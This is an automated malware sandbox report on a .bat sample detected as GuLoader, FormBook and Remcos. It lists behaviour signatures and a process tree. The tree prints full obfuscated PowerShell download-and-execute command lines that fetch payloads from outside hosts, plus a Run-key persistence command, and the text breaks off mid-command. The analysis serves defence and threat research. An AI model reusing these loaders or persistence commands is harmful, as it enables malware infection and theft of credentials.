Windows Analysis Report
PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat

Overview

General Information

Sample name: PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
Analysis ID: 1500456
MD5: a7cf853aab7a489baa2e3fc8e31ab25f
SHA1: b114e9292f9c733594bc058fbec8f7ed63bfc208
SHA256: 5f6652b2b1984430374890d518550109bcef83b980557b985e502e70e80a7392
Tags: bat

Detection

FormBook, GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7616 cmdline: powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. 
vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7796 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7860 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. 
vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7944 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7328 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 5904 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 4504 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wscript.exe (PID: 7360 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • powershell.exe (PID: 5288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. 
oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 2208 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • powershell.exe (PID: 8084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir 